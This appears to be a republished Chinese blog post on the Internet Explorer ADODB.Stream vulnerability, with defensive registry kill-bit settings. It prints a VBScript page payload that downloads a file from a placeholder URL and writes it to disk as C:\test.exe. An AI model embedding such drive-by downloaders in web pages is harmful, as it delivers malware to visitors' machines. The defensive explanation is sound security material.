zoukankan      html  css  js  c++  java
  • ADODB.Stream漏洞

    ADODB.stream漏洞简介

    <script language=vbscript>
      const adTypeBinary=1
      const adSaveCreateOverwrite=2
      const adModeReadWrite=3
      set xmlHTTP=createObject("microsoft.xmlHTTP")
      xmlHTTP.open "GET","目标URL,可以是任意文件",false   '最后一个参数是设置是否异步访问
      xmlHTTP.send
      contents=xmlHTTP.responseBody  '这里是关键,也可以不用xmlHTTP对象,用HTTP也可以,
                                                            '但要返回有文件的内容
      set oStr=createObject("ADODB.stream")
      oStr.mode=adModeReadWrite
      oStr.Type=adTypeBinary
      oStr.open
      ostr.write(contents)   '前面返回的内容
      oStr.savetofile "C:\\test.exe",adSaveCreateOverwrite
    </script>
      

    如何防范?
    1下载专杀工具,估计也是卸载adodb.stream

    2改注册表

    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet

    Explorer\ActiveX Compatibility\{4B106874-DD36-11D0-8B44-00A024DD9EFF}
    里dword值Compatibility Flags=0x00000400

    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet

    Explorer\ActiveX Compatibility\{00000566-0000-0010-8000-00AA006D2EA4}

    里dword值Compatibility Flags=0x00000400
    第一个是adodb.stream2.5 第二个是2.7
    这样 Internet Explorer 识别此注册表项时,Internet Explorer 不允许在浏览器中启动此组件。

  • 相关阅读:
    word文档的图片怎么保存到Web编辑器上
    如何在linux下查看gpu信息

    lua注释
    readDouble
    ..在lua中运用
    C++条件分支结构
    C++条件分支结构
    Flink基础(十六):Table API 和 Flink SQL(一)整体介绍
    Flink基础(十四):DS简介(14) 搭建Flink运行流式应用
  • 原文地址:https://www.cnblogs.com/goodloop/p/295758.html
Copyright © 2011-2022 走看看